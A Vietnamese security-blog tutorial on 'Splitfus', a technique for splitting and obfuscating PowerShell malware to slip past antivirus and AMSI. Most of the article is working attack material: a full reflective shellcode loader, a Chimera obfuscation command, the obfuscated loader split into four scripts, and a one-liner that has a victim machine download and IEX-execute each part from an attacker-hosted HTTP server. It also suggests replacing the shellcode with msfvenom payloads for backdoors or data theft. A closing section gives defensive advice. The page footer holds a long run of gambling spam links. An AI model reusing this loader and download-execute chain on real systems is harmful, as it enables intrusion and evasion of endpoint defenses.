• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell

Hevin by Hevin
20/07/2025 - Updated on 25/07/2025
in Virus-Trojan-Rat
A A
0

Mục lục bài viết

  1. Cách phòng thủ trước kỹ thuật Splitfus
    1.  Tăng cường giám sát PowerShell
    2. Kích hoạt và bảo vệ AMSI (Antimalware Scan Interface)
    3. Kiểm tra hành vi tải động trong hệ thống
    4. Thiết lập kiểm soát truy cập mạng chặt chẽ
  2. Câu hỏi thường gặp
    1. Splitfus là gì và tại sao nó hiệu quả trong việc vượt qua Antivirus?
    2. Kỹ thuật Splitfus hoạt động như thế nào trong thực tế?
    3. Có những công cụ nào hỗ trợ thực hiện kỹ thuật Splitfus?

Hiện nay, các hệ thống phòng thủ như Antivirus (AV) và Endpoint Detection & Response (EDR) ngày càng mạnh mẽ. Tuy nhiên, các nhóm hacker vẫn liên tục sáng tạo những kỹ thuật tinh vi để vượt qua lớp bảo vệ này. Một trong những kỹ thuật phổ biến đó là Splitfus. Đây là phương pháp chia nhỏ mã độc PowerShell và làm rối code (obfuscate), sau đó thực thi từng phần theo nhiều giai đoạn (staged delivery). Vậy vì sao kỹ thuật này lại hiệu quả đến vậy? Hãy cùng mình đi tìm hiểu nhé !

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Splitfus là gì ?

Splitfus (viết tắt của Split + Obfuscation) là kỹ thuật mà hacker sử dụng để:

Các bài viết liên quan

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025 - Updated on 25/07/2025

6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus

25/08/2023 - Updated on 24/07/2025

Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén

19/08/2023
Hide Malware In Image

Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ?

05/08/2023 - Updated on 24/07/2025
  • Chia nhỏ (split) mã độc PowerShell thành nhiều đoạn, ví dụ: malware1.ps1, malware2.ps1, malware3.ps1,…
  • Làm rối (obfuscate) từng đoạn mã để tránh bị phân tích hoặc phát hiện bởi chữ ký của AV
  • Thực thi theo nhiều giai đoạn (staged execution): Khi thực hiện tấn công, máy nạn nhân sẽ tải từng đoạn mã từ máy chủ hacker và chạy trực tiếp trong bộ nhớ, thay vì lưu toàn bộ payload trên đĩa. Đây là kiểu thực thường được biết đến với tên gọi multi-stage attack hoặc fileless malware

Tại sao Splitfus hiệu quả trong việc vượt qua Antivirus ?

  • Giảm khả năng bị phát hiện theo chữ ký (signature-based detection)
  • AV truyền thống dựa vào chữ ký hoặc mẫu mã độc. Khi mã độc được chia nhỏ và mã hóa, không có đoạn nào chứa toàn bộ payload, khiến việc phát hiện trở nên khó khăn
  • Tránh quét tĩnh và sandbox
    • Nếu toàn bộ payload nằm trong một file, AV dễ dàng phân tích trước khi chạy
    • Với Splitfus, mã độc được tải động (on-demand) từ máy chủ hacker, nên môi trường sandbox khó tái hiện được toàn bộ quy trình
  • Bypass AMSI (Antimalware Scan Interface)
  • AMSI của Windows có khả năng quét nội dung PowerShell trước khi thực thi. Tuy nhiên, với Splitfus:
    • Các đoạn mã nhỏ, obfuscated và tải động → khó bị AMSI phân tích đầy đủ
    • Nhiều hacker còn kết hợp AMSI bypass với Splitfus để tăng hiệu quả
  • Linh hoạt và dễ cập nhật
  • Hacker có thể thay đổi một đoạn bất kỳ trên máy chủ mà không cần phát tán lại toàn bộ payload. Điều này khiến việc truy vết hoặc phát triển chữ ký AV trở nên khó hơn

Phần lý thuyết đơn giản ngắn gọn vậy thôi, bây giờ mình sẽ lấy ví dụ thực tế cho bạn dễ hình dung hơn cách kỹ thuật được thực hiện

Ví dụ thực tế

Nhiều chiến dịch tấn công APT và malware framework như Cobalt Strike, PowerShell Empire, Metasploit đã áp dụng cơ chế tương tự Splitfus để phát tán payload staged. Đây là xu hướng phổ biến trong các cuộc tấn công fileless hiện nay.

Xem thêm:  Botnet là gì ? Hướng dẫn tạo botnet đơn giản

Được rồi, bây giờ cùng mình thử chạy 1 đoạn code Powershell sau: Write-Host “Invoke-Mimikatz” . Ồ bạn thấy đấy, Antivirus đã phát hiện và chặn đoạn mã này. Đây là chỉ 1 đoạn mã in ra chuỗi trên terminal mà tại sao lại bị chặn nhỉ ? Bởi vì nó chứa chuỗi ký tự “Invoke-Mimikatz”. Đây là một chữ ký (signature) cực kỳ nổi tiếng và đặc trưng của công cụ tấn công Mimikatz

Screenshot 2025-07-18 221618.png

Như vậy, các AV được cấu hình để chặn ngay lập tức bất kỳ đoạn mã nào chứa chữ ký nguy hiểm này, ngay cả ở giai đoạn sớm nhất, nhằm ngăn chặn mọi ý đồ tiềm tàng liên quan đến Mimikatz. Đây là một biện pháp phòng ngừa rủi ro.

Vậy là chúng ta đã biết cách AV được cấu hình, giờ hãy thử tách chuỗi “Invoke-Mimikatz” thành nhiều chuỗi ngắn khác nhau.

Screenshot 2025-07-18 221712.png

Như bạn thấy, dù tách chuỗi thành các phần nhỏ như “Invo”, “ke”, “-Mim”, “ikatz”, AV vẫn không phát hiện ra đoạn mã độc. Sau đó, khi chúng ta nối lại các chuỗi này trong quá trình thực thi kết quả vẫn là “Invoke-Mimikatz” nhưng đã vượt qua được hệ thống phát hiện của AV. Đây chính là ví dụ đơn giản nhất của kỹ thuật Splitfus

Bây giờ chúng ta cùng xem 1 ví dụ khai thác thực tế hơn với đoạn code Powershell sau, với file tên là sc-original.ps1

[Byte[]] $shellcode = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)

function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp = $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$handle = $assem.GetMethod('GetModuleHandle').Invoke($null, @($moduleName));
[IntPtr] $result = 0;
try {
Write-Host "First Invoke - $moduleName $functionName";
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}catch {
Write-Host "Second Invoke - $moduleName $functionName";
$handle = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $handle);
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}
return $result;
}

function getDelegateType {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $lpMem, $shellcode.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)

Đây là đoạn mã Powershell thực thi Shellcode của calc.exe trên Windows, nếu chúng ta thực thi toàn bộ đoạn mã này thì sẽ bị AV chặn. Và lúc này mình sẽ áp dụng kĩ thuật Splitfus. Trước tiên mình sẽ sử dụng công cụ Chimera để xáo trộn đoạn mã này trở nên khó đọc hơn với câu lệnh sau

./chimera.sh -f sc-original.ps1 -l 3 -v -t -s -b -j -o sc-obf.ps1

Screenshot 2025-07-19 121306.png

Giờ đây, đoạn mã Powershell ban đầu đã được làm rối bằng cách thay đổi biến. Tiếp theo, mình sẽ chia tệp này thành nhiều phần nhỏ hơn để thực thi một cách rời rạc, khiến hệ thống bảo mật không thể phát hiện ra chữ ký đặc trưng của shellcode

Tiếp theo, mình chia tệp sc-obf.ps1 thành 4 tệp riêng biệt: sc1.ps1 ( chứa biến lưu trữ Shellcode ), sc2.ps1 ( chứa hàm LookupFunc đã làm rối ), sc3.ps1 ( chứa hàm getDelegateType đã làm rối ) và sc4.ps1 ( chứa 3 dòng code cuối cùng ). Mỗi phần này nếu bị quét riêng lẻ sẽ không gây cảnh báo từ AV. Đây là đoạn code đã xáo trộn và tách ra riêng biệt từng file như mình nói

#sc1.ps1
[Byte[]] $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)
#sc2.ps1
function iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs {
Param ($JzGCXcYJmJdQKoCerSqNXT, $LaHgzlZeSdXkwSwksNKHLbDEymlFp)
$FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$jWwCsHjXRPShPEyyEBpzOw = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$aFUfleAnufbxjgylCpxMoZnlpUkts = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethod('GetModuleHandle').Invoke($null, @($JzGCXcYJmJdQKoCerSqNXT));
[IntPtr] $XHcKpPqwXEaSejzfchayBW = 0;
try {
Write-Host "First Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}catch {
Write-Host "Second Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$aFUfleAnufbxjgylCpxMoZnlpUkts = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $aFUfleAnufbxjgylCpxMoZnlpUkts);
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}
return $XHcKpPqwXEaSejzfchayBW;
}

 

#sc3.ps1
function DdKSsQGFmFfVhpHEtVzHaZFCWQGs {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $GVUAdTXmnEpoFzPorhRfka,[Parameter(Position = 1)] [Type] $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB = [Void])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
return $YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.CreateType()
}

 

#sc4.ps1
$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll VirtualAlloc),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe, 0, $WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll CreateThread),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH,[IntPtr]::Zero,0,[IntPtr]::Zero)

Các bước để thực hiện kĩ thuật Splitfus này cũng rất đơn giản. Đầu tiên, mình sử dụng lệnh sau để khởi tạo server Python trên cổng 80 với địa chỉ IP là 192.168.1.17:

Xem thêm:  SPYNOTE V6.4 Full Phần mềm Keylogger trên Android

python3 -m http.server 80

Server này sẽ lưu các file script PowerShell đã tách nhỏ và làm rối, cho phép máy nạn nhân tải xuống từng phần riêng biệt.

Cuối cùng mình tạo 1 đoạn lệnh thực thi ngắn gọn để thực thi trên máy nạn nhân

1..4 | ForEach-Object { IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.1.17/sc$_.ps1") }

Lệnh này sẽ tải xuống và thực thi từng file script từ sc1.ps1 đến sc4.ps1. Đây là cách hiệu quả để vượt qua các cơ chế phát hiện mã độc vì mỗi phần riêng lẻ có thể trông vô hại. Khi kết hợp lại, chúng tạo thành một cuộc tấn công hoàn chỉnh mà nhiều giải pháp bảo mật không thể phát hiện

Với Metasploit, việc tạo shellcode trở nên dễ dàng hơn rất nhiều. Mình sẽ sử dụng lệnh msfvenom để tạo ra shellcode mới, sau đó thay thế vào script sc1.ps1. Điều này cho phép mình tùy biến cuộc tấn công theo nhiều hướng khác nhau, từ lấy quyền điều khiển máy tính nạn nhân đến đánh cắp thông tin hoặc cài đặt backdoor

https://streamable.com/rwoo4k

Và đó là những ví dụ đơn giản, nhưng thực tế, mã độc PowerShell không hề đơn giản như vậy. Các hacker sẽ phải dùng thêm kĩ thuật Bypass AMSI để tăng tỉ lệ thành công

Cách phòng thủ trước kỹ thuật Splitfus

Kỹ thuật Splitfus là một trong những phương pháp tấn công bằng PowerShell tinh vi, khó phát hiện nếu hệ thống không được giám sát chặt chẽ. Để phòng thủ hiệu quả trước Splitfus, đội ngũ an ninh mạng cần triển khai đồng bộ nhiều biện pháp chủ động, từ việc giám sát hành vi cho đến xây dựng hệ thống cảnh báo sớm và đào tạo người dùng cuối.

 Tăng cường giám sát PowerShell

PowerShell là công cụ thường bị lạm dụng trong các cuộc tấn công hiện đại. Để theo dõi hoạt động bất thường, hệ thống cần bật tính năng ghi nhật ký Script Block Logging (sử dụng Event ID 4104) kết hợp với Module Logging. Những thiết lập này giúp lưu lại toàn bộ lệnh PowerShell đã được thực thi, kể cả khi đã bị làm rối mã (obfuscate). Ngoài ra, nên kích hoạt chế độ Constrained Language Mode để hạn chế việc sử dụng các lệnh nguy hiểm trong môi trường thực thi PowerShell.

Xem thêm:  8 Keylogger tốt nhất giúp phụ huynh theo dõi con cái

Kích hoạt và bảo vệ AMSI (Antimalware Scan Interface)

AMSI là lớp phòng vệ quan trọng giúp phân tích mã trước khi được thực thi trong PowerShell. Việc đảm bảo AMSI luôn được bật và không bị vượt qua (bypass) là điều thiết yếu. Khi tích hợp cùng Microsoft Defender hoặc các giải pháp EDR có hỗ trợ quét AMSI, khả năng phát hiện mã độc bị làm rối sẽ được nâng cao rõ rệt, giúp ngăn chặn sớm các hành vi tấn công từ Splitfus.

Kiểm tra hành vi tải động trong hệ thống

Một đặc điểm thường thấy của Splitfus là sử dụng các tham số nguy hiểm trong PowerShell như EncodedCommand hoặc gọi hàm IEX để tải mã từ xa thông qua chuỗi như (New-Object Net.WebClient).DownloadString. Hệ thống EDR hoặc HIDS cần được cấu hình để nhận diện những hành vi này. Đồng thời, cần cảnh giác khi phát hiện script được tải về từ domain không đáng tin cậy, đặc biệt là các yêu cầu HTTP GET chứa tập tin đuôi .ps1.

Thiết lập kiểm soát truy cập mạng chặt chẽ

Kiểm soát truy cập mạng đóng vai trò quan trọng trong việc ngăn chặn Splitfus giao tiếp với máy chủ điều khiển (C2 server). Cần chủ động chặn các kết nối outbound đến địa chỉ IP hoặc domain nghi ngờ. Việc cấu hình proxy kết hợp với kiểm tra TLS (TLS inspection) sẽ giúp phát hiện các hành vi tải mã ẩn dưới kết nối được mã hóa. Bên cạnh đó, cập nhật liên tục các chỉ số tấn công (IOC) từ nguồn Threat Intelligence Feed sẽ nâng cao khả năng nhận diện và phản ứng kịp thời.

Cuối cùng, yếu tố con người luôn là mắt xích yếu nhất trong chuỗi phòng thủ. Việc tuyên truyền và đào tạo người dùng cuối nhằm nâng cao nhận thức bảo mật là điều bắt buộc. Nhân viên cần được hướng dẫn không chạy script từ các nguồn không rõ ràng. Đồng thời, kỹ năng nhận diện email giả mạo (phishing) cũng cần được chú trọng vì đây thường là điểm xuất phát của các cuộc tấn công Splitfus.

Câu hỏi thường gặp

Splitfus là gì và tại sao nó hiệu quả trong việc vượt qua Antivirus?

Splitfus là kỹ thuật hacker chia nhỏ mã độc PowerShell, làm rối code và thực thi từng phần. Điều này giúp giảm khả năng bị phát hiện dựa trên chữ ký, tránh quét tĩnh và sandbox, đồng thời bypass AMSI (Antimalware Scan Interface).

Kỹ thuật Splitfus hoạt động như thế nào trong thực tế?

Hacker chia mã độc thành nhiều đoạn nhỏ, mã hóa chúng và tải từng đoạn lên máy nạn nhân để thực thi. Việc này làm cho mã độc khó bị phát hiện hơn so với việc tải và thực thi một file mã độc lớn.

Có những công cụ nào hỗ trợ thực hiện kỹ thuật Splitfus?

Nhiều chiến dịch tấn công APT và framework malware như Cobalt Strike, PowerShell Empire, Metasploit sử dụng kỹ thuật tương tự Splitfus. Ngoài ra, các công cụ như Chimera có thể giúp làm rối mã nguồn PowerShell, hỗ trợ việc sử dụng kỹ thuật này.

Tags: mã độcSplitfusvirus
Hevin

Hevin

Related Posts

cach lay certificate phan mem khac
Virus-Trojan-Rat

Cấy Certificate từ App khác vào Virus để Bypass AV

08/01/2023 - Updated on 24/07/2025
Virus-Trojan-Rat

Cách tạo Backdoor đơn giản với CMD

06/01/2023 - Updated on 24/07/2025
Virus-Trojan-Rat

AnonyvietTrojan v1.2 – Update cho Linux OS và chức năng đính kèm virus

04/12/2022 - Updated on 24/07/2025
Virus-Trojan-Rat

Villain – Bypass AntiVirus chiếm quyền Shell Windows và Linux

26/11/2022 - Updated on 24/07/2025
AT v1.1 - Update chức năng mã hóa RAT vượt qua Windows Defender
Virus-Trojan-Rat

AnonyvietTrojan v1.1 – Update mã hóa RAT vượt qua Windows Defender

04/11/2022 - Updated on 24/07/2025
AnonyvietTrojan - Công cụ giúp Virus vượt qua Windows Defender
Virus-Trojan-Rat

AnonyvietTrojan – Công cụ giúp Virus vượt qua Windows Defender

22/09/2022 - Updated on 24/07/2025
Subscribe
Notify of
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
oldest
newest
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

Top 4 cách nhận biết video Deepfake

by Thanh Kim
03/09/2025
0

Cách nén file PDF siêu tốc với Minimal PDF Compress

by Thanh Kim
02/09/2025
0

10 ứng dụng Android nên cài mà không phải ai cũng biết

by Thanh Kim
01/09/2025 - Updated on 02/09/2025
0

Hướng dẫn nhận 50GB iCloud miễn phí trong 3 tháng qua MoMo

by Thanh Kim
31/08/2025
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • phuong trong Hướng dẫn nhận 80GB Data miễn phí từ Vinaphone từ 15/8
  • Quí trong Hướng dẫn nhận 80GB Data miễn phí từ Vinaphone từ 15/8
  • khoi trong Tut hướng dẫn Hack 4G mới nhất cho sinh viên
  • BaoChi trong Hack Mod Free Fire 1.109 OBB 48 Hack Map Headshot
  • Jiang trong Hướng dẫn nhận Perplexity Pro 1 năm miễn phí trị giá $200
  • dhin trong App check hàng giả: Lá chắn bảo vệ bạn khỏi ma trận hàng fake
  • Communist456 trong Nhận ngay key bản quyền iTop Easy Desktop v3 miễn phí 6 tháng
  • Hevin trong Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit
  • khoa trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • Anh trong Genspark: Công cụ AI Agent giúp tải mọi thứ chỉ bằng một câu lệnh
  • AnonyViet trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • phuong trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • Tòn Seven trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • AnonyViet trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • Tuan trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • AnonyViet trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • Thg Trn trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • Phuong trong Download Deep Freeze 8.6 Full Key – Phần mềm đóng băng ổ đĩa
  • datdeptrai trong Tạo Virus nguy hiểm Tắt Internet vĩnh viễn bằng Notepad
  • Kim trong Cách phát hiện mã QR độc hại để tránh bị lừa đảo

©2025 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ kết quả xổ số hôm nay trực tiếp bóng đá xoilac colatv truc tiep bong da trang chủ hi88 trang chủ hi88 KUBET xoilac 8XBET Kubet https://new88.market/ bong88 https://cwfun.org/ https://hi88.gives/ 33win 789win ww88 kubet https://thabet-vn.com/ Ae888 kubet 789Club 188BET 188BET Link https://789club10.pro kubet 8kbet pg88 99ok xin88 good88 https://www.chantalsutherlandjockey.com/ https://www.go88vn.uk.com/ https://www.rikvip-viet.net/ kubet 32WIN RR88 cakhiatv Thapcam TV https://33winlink.live/ f8bet https://qq883a.com/ https://789betviet.com/ rr88 XX88 Leo88 Leo88 nha cai uy tin mu88 casino Vebo TV https://v9betnet.com/ https://ee88vie.com/ max88 iwin SV388 69VN Zomclub https://hi88fz.com/ https://u888.one/ https://go886.org/ https://sunwin10.org/ https://789club10.life/ Jun88 https://jun88pro.org/ 77Bet HB88 123b https://33winvn.me/ hello88 188bet kubet11 k8cc f168 luckywin fm88 xin88 https://918xxy.com/ https://77betvn.me/ https://hb88vn.live/ kubet thailand vip66 xoso66 vip66 xoso66 luckywin https://tp88fun.com/ trang chủ hi88 daga f8bet hello88 qq88 Luckywin NH88 https://abc8.furniture/ leo88 hb88 77bet GK88 PG88 SV388 PG88 Xoso66 Vip66 hitclub HB88 HB88 https://hubett2.org/ bong99 Ga6789 DAGA XOSO66 new882.info Hi88 8day Thabet 33win Bk8 fun88 789win w88 nhà cái uy tín Go88 sunwin sunwin jun88 rikvip hitclub sunwin go88 98win s666 sv388 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 abc8 c54 i9bet ok365 ae888 https://keonhacai.fund/ https://max886.org/ sunwin 32win NH88 33win com https://ok9393.com/ PG88 alo789s sv368pro https://xx88.tech/ xoilac cakhiatv socolive QQ88 TP88 hi 88 King88 Xoso66 xoso66 u888 rr88 79king pg88 f168 88vv https://xx88.tech/ https://mm88.today/ mu88 com 8kbet Xin88 Nohu90 https://qq88pro.vip/ https://vzqq888.com/ https://king88kr.pro/ https://mb66.bz https://789win1.live/ xoso66 98win motphimtv 32win fun88.supply king88 33win NH88 https://fun88.supply/ https://pg88p.top/ hello88 w88 8xbet sv388 betvisa bong88 fun88 78win 8day 8day v9bet s666 go88 luongsontv KUWIN 3389 SH BET u888lm.com https://max88rl.com/ https://ok365rl.com/ HI888 RR88 kubet EE88 FB88 77BET TYPHU88 https://xx88.ink/ https://vb88.social/ game bài đổi thưởng 789BET RR88 https://da88.design/ luongsontv 789f Kkwin go88 S66 sv368 79king https://urr88.com/ sv388 58win xin88 XO88 XX88 VSBET 23WIN TA88 https://88aa.rest/ https://mb66co.com/ TD88 https://fun88.supply/ https://qq88gg.net/ 69vn pg88 colatv truc tiep bong da thapcamtv thapcamtv https://go8h.com/ 8x bet iwin club rik vip https://rr88.navy/ https://e2beting.com/ gem88 f8bet bk8 bk8 Luck8 F8BET80 soc88 typhu88 k8cc k8cc 12bet sa88 cado888 